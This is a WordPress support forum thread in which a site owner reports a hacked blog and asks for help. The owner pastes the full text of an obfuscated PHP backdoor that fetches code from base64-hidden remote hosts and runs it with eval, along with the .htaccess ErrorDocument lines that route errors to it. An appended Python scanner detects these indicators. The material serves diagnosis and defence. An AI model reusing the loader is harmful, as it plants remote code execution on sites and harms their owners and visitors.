WordPress.org


Hacked? Random Files All Over And Can't Access Blog! Getting Blank Screen (2 posts)

  1. ishan001
    Member
    Posted 3 years ago #

    Hi,
    I am having a small problem with my WordPress blog http://bloggingwithsuccess.net/
    I cannot access my blog using any address. Only http://www.bloggingwithsuccess.net can be accessed. No access to WP Admin with or without www. I get a blank page there.
    I think this might be some hack because my directories have random PHP files in them like 9252.php, 434356.php, etc.
    The contents of one such file (in root) are:
    <? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwdGFncy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="90cbdbbfee9206165343490e02a4d12c") $f=$_REQUEST["id"];if($c=file_get_contents(base64_decode("aHR0cDovLzdhZHMu").$f.$z))eval($c);else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
    I recently moved to a new host, and when I checked the old host, there were no files like this on their server. My full cPanel backup also does not have these files. So, is it hacked?
    Now, how do I get my blog back?
    Interesting: I tried to access another site on the same account, which also has the same files (with different names), and I can access it easily!
    Thanks.

  2. ishan001
    Member
    Posted 3 years ago #

    One more thing, I have one .htaccess file in every folder that refers to the random file as the error page.
    Example:

    Options -MultiViews
    ErrorDocument 404 //ishan/cgi-bin/112443.php

This topic has been closed to new replies.
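
A defensive sweep for the three indicators described in this thread (numeric-named PHP files, .htaccess ErrorDocument entries that point at such a file, and PHP that combines eval, base64_decode and a remote fetch), as an added example that is not part of the original posts. The function names, the sample tree and the inert stand-in file bodies are constructed for illustration.

```python
import os
import re
import tempfile

NUMERIC_PHP = re.compile(r"^\d+\.php$", re.I)  # e.g. 9252.php, 434356.php
ERRDOC = re.compile(r"^\s*ErrorDocument\s+\d{3}\s+(\S+\.php)\s*$", re.I | re.M)
LOADER = [re.compile(p, re.I) for p in (       # all three must appear in one file
    r"\beval\s*\(", r"base64_decode\s*\(", r"file_get_contents\s*\(|curl_exec\s*\(")]

def scan(root):
    """Return sorted (relative_path, reason) findings under root."""
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name != ".htaccess" and not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    text = fh.read(1_000_000)  # cap the read; these files are small
            except OSError:
                continue
            if name == ".htaccess":
                # Flag only error pages that resolve to a numeric-named script.
                for target in ERRDOC.findall(text):
                    if NUMERIC_PHP.match(target.rsplit("/", 1)[-1]):
                        findings.append((rel, "ErrorDocument -> " + target))
                continue
            if NUMERIC_PHP.match(name):
                findings.append((rel, "numeric-name"))
            if all(p.search(text) for p in LOADER):
                findings.append((rel, "eval+base64+remote-fetch"))
    return sorted(findings)

def build_sample(root):
    """Constructed sample tree; the .php bodies are inert stand-ins."""
    sample = {
        "index.php": "<?php echo 'hello'; ?>\n",
        "cgi-bin/112443.php": "<?php // inert stand-in\n// eval( base64_decode( file_get_contents(\n",
        "wp-content/.htaccess": "Options -MultiViews\nErrorDocument 404 //ishan/cgi-bin/112443.php\n",
    }
    for rel, body in sample.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for rel, reason in scan(tmp):
            print(rel, "|", reason)
```

Run `scan()` against a copy of the web root and compare the findings with a known-good backup; a clean result does not prove the site is clean, since the file names and loader text can vary.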
